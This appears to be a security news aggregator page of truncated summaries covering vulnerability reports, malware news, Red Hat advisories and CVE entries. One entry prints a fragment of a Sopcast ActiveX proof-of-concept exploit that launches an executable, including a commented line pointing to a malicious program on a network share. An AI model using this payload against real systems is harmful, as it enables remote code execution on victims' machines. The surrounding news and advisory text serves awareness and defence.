ASCPU 0.60 Kernel Memory File Descriptor Leakage Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/5716/info It has been reported that ascpu is vulnerable to a leakage of open file descriptors that may result in unauthorized disclosure of kernel memory. It is allegedly possible for attackers to inherit the open file...

WMMon 1.0 b2 Memory Character File Open File Descriptor Read Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/5718/info It has been reported that wmmon is vulnerable to a leakage of open file descriptors that may result in unauthorized disclosure of kernel memory. It is allegedly possible for attackers to inherit the open file...

Volafox - Mac OS X & BSD Memory Analysis Toolkit

Volafox is an open source toolkit that you can use for Mac OS X and BSD forensics. The tool is a python based and allows investigating security incidents and finding information for malwares and any malicious program on the system. Security analyst can have the following information using this...

The Android framework layer vulnerability-Fragment injection-vulnerability warning-the black bar safety net

Original: A New Vulnerability in the Android Framework: Fragment Injection Source: http://securityintelligence.com/new-vulnerability-android-framework-fragment-injection/comments Author: Roee Hay,IBM's Application Security Research Team Time: 2013.12.10 Recently we to the Android security team ha...

Safari Stores Previous Browsing Session Data Unencrypted

Users of Apple’s Safari browser are at risk for information loss because of a feature common to most browsers that restores previous sessions. The problem with Safari is that it stores session information including authentication credentials used in previous HTTPS sessions in a plaintext XML file...

Android ZIP文件提取classes.dex文件签名校验绕过漏洞

Google Android是一种以Linux为基础的开放源代码操作系统，主要使用于便携设备 Google Android在签名验证过程中，对Zip文件相应16位域的读取时，没有考虑到大于2^15的情况。通过构建特殊的classes.dex，可绕过签名校验，安装恶意程序 0 Google Android 4.2 厂商解决方案 目前没有详细解决方案提供： http://www.android.com/...

Android Malware that can DDoS Attacks from your smartphone

The Russian anti-virus vendor Doctor Web has found a new malicious program for Android which allows hacker groups to carry out mobile denial of service attacks. While it's not entirely clear how the Trojan is spread, researchers suspect that the attackers use social engineering tactics since the...

Virus conducting DDoS attack from infected systems

Russian anti-virus company Doctor Web is warning users about the malicious program which is helping attackers carry out mass spam mailings and allow attacker to use victim's PC as slave of his DDOS Army. According to researchers from the company they have discovered a Trojan "Trojan.Proxy.23012"...

miniFlame - A New cyber espionage malware discovered

Kaspersky has discovered new malware dubbed 'miniFlame', cyber espionage software directly linked to Flame. This new nation-state espionage malware that has ties to two previous espionage tools known as Flame and Gauss, and that appears to be a "high-precision, surgical attack tool" targeting...

Dark Comet RAT Tailored For Attacks On Gamers, Governments

Researchers analyzing the Dark Comet remote access Trojan RAT program say that data from more than 400 campaigns suggests the malicious program is being used for a wide range of jobs, from attacks on online gamers, to potential hacks of air force bases and government Web sites. In the blog entry,...

Common Firewall Feature Enables TCP Hijacking Attacks

Attackers using a feature that is common to many firewalls, switches and other networking gear could silently hijack Web sessions on mobile and desktop devices, according to a research paper presented by two Ph.D students from the University of Michigan. The two discovered that so-called TCP...

Medium: httpd

Issue Overview: It was discovered that the fix for CVE-2011-3368 did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a...

Moderate: Red Hat Security Advisory: httpd security update

Updated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System CVSS base scores, which give detailed severity ratings, are...

Step 1: Understand The Problem

The first step in dealing with a scareware is to understand what has just happened to your computer. Victims often ignore or miss the signs of a rogue AV infection, says Nicolas Brulez, a senior malware researcher at Kaspersky Lab. This is especially true with scareware, which tries to fool you...

Malware Piggybacks On Anti-Phishing Software

Malware authors have discovered a shortcut to create a Trojan horse program: using components from an anti-phishing product from China-based Zhuhai Kingsoft Software. Symantec researcher Poul Jensen wrote about the malware on that company’s Connect blog on Wednesday. The Trojan package...

STDU explorer DLL Hijacking Exploit (dwmapi.dll)

Exploit for windows platform in category local exploits ================================================ STDU explorer DLL Hijacking Exploit dwmapi.dll ================================================ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\...

Updated Android Trojan Pushed in SEO Attacks

Mobile attacks may have reached a tipping point, as researchers observe search engine optimization used to spread a malicious program for mobile devices running the Android operating system. One month after researchers first identified a Trojan horse program that targets mobile devices running...

Sopcast Sopcore Active-X Code Execution

window.onload=function SopPlayer.InitPlayer; //SopPlayer.SetExternalPlayer"\\192.168.0.1\c$\PATH\TO\MALICIOUSPROGRAM.EXE"; SopPlayer.SetExternalPlayer"c:\WINDOWS\system32\calc.exe"; SopPlayer.SetSopAddress"sop://broker.sopcast.com:3912/6002"; //A LIVE CHANNEL...

DEBIAN-CVE-2008-0302

Untrusted search path vulnerability in apt-listchanges.py in apt-listchanges before 2.82 allows local users to execute arbitrary code via a malicious apt-listchanges program in the current working directory...

CVE-2003-1358

rs.F300 for HP-UX 10.0 through 11.22 uses the PATH environment variable to find and execute programs such as rm while operating at raised privileges, which allows local users to gain privileges by modifying the path to point to a malicious rm program...